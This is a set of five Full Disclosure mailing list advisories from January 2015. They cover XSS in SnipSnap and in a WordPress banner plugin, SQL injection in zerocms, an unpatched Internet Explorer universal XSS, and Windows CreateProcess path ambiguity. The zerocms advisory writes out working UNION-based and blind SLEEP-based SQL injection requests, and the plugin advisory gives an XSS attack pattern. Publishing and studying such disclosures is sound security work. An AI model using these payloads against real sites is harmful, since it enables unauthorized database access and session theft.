[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS
Product: SnipSnap
Vulnerable Versions: 0.5.2a  1.0b1  1.0b2
Tested Version: 0.5.2a  1.0b1  1.0b2
Advisory Publication: Jan 30, 2015
Latest Update: Jan 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9559
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





Advisory Details:


(1) Vendor  Product Description

Vendor:
SnipSnap

Product  Version:
SnipSnap
0.5.2a
1.0b1
1.0b2


Vendor URL  Download:
http://snipsnap.org

Product Description:
SnipSnap is a user friendly content management system with features such
as wiki and weblog. 







(2) Vulnerability Details:
SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at snipsnap-search? page with query
parameter.






References:
http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559
https://security-tracker.debian.org/tracker/CVE-2014-9559
http://www.cvedetails.com/cve/CVE-2014-9559/
http://www.security-database.com/detail.php?alert=CVE-2014-9559
http://packetstormsecurity.com/files/cve/CVE-2014-9559
http://www.pentest.it/cve-2014-9559.html
http://www.naked-security.com/cve/CVE-2014-9559/
http://007software.net/cve-2014-9559/
https://security-tracker.debian.org/tracker/CVE-2014-9559






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] SQL injection vulnerabilities in zerocms = v.1.3.3

[Steffen Rösemann]

Advisory: SQL injection vulnerabilities in zerocms = v.1.3.3
Advisory ID: SROEADV-2015-13
Author: Steffen Rösemann
Affected Software: zerocms = v.1.3.3 (released 23rd-Jan-2015)
Vendor URL: http://aas9.in/zerocms/
Vendor Status: platform will be moving to Rails4
CVE-ID: -

==
Vulnerability Description:
==

Content management system Zerocms v. 1.3.3 suffers from SQL injection
vulnerabilities.

==
Technical Details:
==

The article_id-parameter used in zero_view_article.php is vulnerable to SQL
injection. It is located here in a common Zerocms-installation and can be
exploited even by unregistered users:

http://{TARGET}/views/zero_view_article.php?article_id=1

Exploit-Example:

http://
{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

A Blind SQL injection vulnerability can be found the file
zero_user_transact.php. The parameter user_id is vulnerable to SQL
injection. See the following example POST-request which serves as
exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=useremail=user%40user.deaccess_level=1user_id=2 AND
SLEEP(30)action=Modify+Account

The Blind SQL injection vulnerability can be exploited on the
administrative backend of Zerocms.

The vulnerabilities described above have been tested on the following
versions of Zerocms:

- v. 1.3.2
- v. 1.3.3

=
Solution:
=

Vendor seems not to provide a patch for this vulnerabilities as version
1.3.3 is the last release for this PHP-based platform. It will be developed
on the Rails4-platform in future releases (see Github repository, release
section).



Disclosure Timeline:

23-Jan-2015 – found the vulnerabilities in v.1.3.2
23-Jan-2015 - informed the developers (see [3])
23-Jan-2015 – release date of this security advisory [without technical
details]
23-Jan-2015 - forked the vulnerable version to keep it available for other
researchers (see [4])
23-Jan-2015 - developer released v.1.3.3 of zerocms
24-Jan-2015 - vulnerabilities can also be found in v.1.3.3
29-Jan-2015 - as vendor will move the platform to Rails4, it seems that
there will be no patch provided (see [5])
29-Jan-2015 - release date of this security advisory
29-Jan-2015 - send to FullDisclosure




Credits:


Vulnerability found and advisory written by Steffen Rösemann.

===
References:
===

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Major Internet Explorer Vulnerability - NOT Patched

[David Leo]

Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.

How To Use
1. Close the popup window(confirm dialog) after three seconds.
2. Click Go.
3. After 7 seconds, Hacked by Deusen is actively injected into 
dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting(XSS)
Impact: Same Origin Policy(SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything 
into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply nice.

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Defense in depth -- the Microsoft way (part 27): the command line you get differs from the command line I use to call you

[Stefan Kanthak]

Hi @ll,

on Windows, the command line an application receives can differ
from the command line the calling application supplies to
CreateProcess*().

The documentation of GetCommandLine()
https://msdn.microsoft.com/en-us/library/ms683156.aspx tells:

| Note  The name of the executable in the command line that
| the operating system provides to a process is not necessarily
| identical to that in the command line that the calling process
| gives to the CreateProcess function. The operating system may
| prepend a fully qualified path to an executable name that is
| provided without a fully qualified path.

This is not the whole truth, another Note is missing there:
when CreateProcess*() is called using a command line with an
UNQUOTED long filename/pathname containing spaces (a well-known
VULNERABILITY: https://cwe.mitre.org/data/definitions/428.html)
it uses tryerror to guess the pathname of the executable.

The documentation of CreateProcess()
https://msdn.microsoft.com/en-us/library/ms682425.aspx tells:

| [...] the module name must be the first white space-delimited
| token in the lpCommandLine string. If you are using a long file
| name that contains a space, use quoted strings to indicate where
| the file name ends and the arguments begin; otherwise, the file
| name is ambiguous. For example, consider the string
| c:\program files\sub dir\program name.
| This string can be interpreted in a number of ways. The system
| tries to interpret the possibilities in the following order:
|c:\program.exe files\sub dir\program name
|c:\program files\sub.exe dir\program name
|c:\program files\sub dir\program.exe name
|c:\program files\sub dir\program name.exe

In the latter 3 cases the command line is but modified too:
Windows adds quotes around the part of the command line which
forms the result of this interpretation and yields the path
to the executable if this part contains a space.

The 4 command lines shown above are transformed into:

c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
c:\program files\sub dir\program name.exe


JFTR: without this transformation splitting of the command line
  into the argv vector would give wrong results ... in
  presense of CreateProcess*() braindead behaviour!
 

Stay tuned!

regards
Stefan Kanthak


PS: the documentation of CommandLineToArgvW()
https://msdn.microsoft.com/en-us/library/bb776391.aspx
contains a funny and surprising remark:

| This function accepts command lines that contain a program name;
| the program name can be enclosed in quotation marks or not.

This does but NOT mean that CommandLineToArgvW() tries to
guess like CreateProcess()!
It treats c:\program files\sub dir\program name
as c:\program files\sub dir\program name.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Banner Effect Header Security Advisory - XSS Vulnerability - CVE-2015-1384

[Onur Yilmaz]

Information

Advisory by Netsparker.
Name: XSS Vulnerability in Banner Effect Header
Affected Software : Banner Effect Header
Affected Versions: 1.2.7 and possibly below
Vendor Homepage : https://wordpress.org/plugins/banner-effect-header/
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-1384
Netsparker Advisory Reference : NS-15-002

Description
---
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details
-
Proof of Concept URLs for XSS in Banner Effect Header:

URL: /wp-admin/options-general.php?page=BannerEffectOptions
Parameter Name: banner_effect_divid
Parameter Type: Post
Attack Pattern:  onclick=alert(1) 

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

21/01/2015 - First Contact
29/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution

Download version 1.2.8 which includes fix for this vulnerability.

Credits  Authors
-
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner  -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security flaws and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting vulnerabilities,
hence it is the first and only False Positive Free web application
security scanner. For more information visit our website on
https://www.netsparker.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/